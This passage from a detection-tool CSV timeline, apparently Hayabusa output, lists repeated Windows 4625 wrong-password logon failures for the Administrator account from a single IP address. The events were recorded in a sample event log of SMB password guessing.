NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ny5LCb1qOIUhxOPY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9jcDgzzqH26DjQ1k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yil94cFkU6UP24SK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bkdVHF3vggCcuNdn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:45.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4dRRI2CS3aVIX4nX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: chDZq3VgxIE2mRb9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.046 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HLVvgMmqLXKZADON : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i4avO2AJSlNb0IUL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mdo5CvycGvGhn33y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: heJfjLl1vbX6lMjZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wOP1E6hd4Jtj4gob : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xa7kMCNz0bEGTBqX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HSxTQ4HsZt2DeYVe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YxHpSQwFSV4hveVM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n3OwzSPomxZLoCe6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e9IfwDZIfYT6A50K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.463 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOf6DbRX4zlNqLdb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 00kXrnJNH40NyoYL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nsNHcb9pnpdRgeL7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ucMhgxMXy9Ch1jNm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cfi3ZaLTECJgjM9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: usugjEEBHlhJvOyu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WQ1pM2CVLt5ITVD5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.746 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NIboW7hNljF3HPpk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rOk5W4rkSYRRw4xS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AJTfcwd8rnFc06iF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.930 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6sm415W5zkvjdnTV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:46.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KEiSbtlmW4ou1mc7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xWeZV5pHt94adwUy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5np7HeCPAFTDdTXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gXbe2jEJVtwaQXlr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7hZFiUCJnaBdHcw4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a71wyo41KV1ZoT7p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogB17WdeOiC19rqn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.286 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ANOLPWG12lkW39Ei : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y1vf7OUxb6TH3Q4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bxU5yumSieUzSgzH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9K5EoWWASU8SlSe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PwZLRPFxaFWwjZEe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8fXgFFb3HTMunsoi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R1RozAr1uhux4cYW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.586 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n7EmuUSv03RnhKsF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jw410HEW8EC3MC9f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UTYp8cEbt3Yggo3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.727 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWJVzgYLWIo7SGCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DP13jPdW5Gdl8z56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LNXOWjHmMDhfFVon : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kka1RiF3f7Nhkf8x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2o90lG6attzWU4ZN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:47.998 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PyPK9kuJdflQ4RKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a9I3El7d7anR0kIz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eDUMTEfNhFuuqMle : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e0F70d1WstkqnQgA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bm0txApQSp1U42N3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JeEe5ENSIZnfc3FG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oasE54Z1FlpswY0d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bhje1BgvxOlG28JM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9iTIv4UQ4En9RA2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.356 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mg8KFm1lCeImj8Sb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h17Fz1s6GJki61jg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Pjjn4FAkJn4h32r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.483 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ARVx3FAAww8Gmfvc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sYIwPg5k1wpvWobN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0sfhYQ54SjC4JTX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nfZYnUPV40FShcqt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XYbvWVCT0tFixZTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XC6Vmz0ql8myDuGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PJ8JvuvZZzwSOzFo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s06yKaogI6FYkXla : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pCjOc7PguxwNKoQR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BX5IosnpdYZK5xZj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfMjB1epEm64wVEX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:48.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pb4FVO2SKsoMyt1K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.003 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1qoRw2jjFx4F6Wx6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:49.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ImiLeiteLoSw32I0 : IP Address: 192.168.198.149 : AuthPackage: 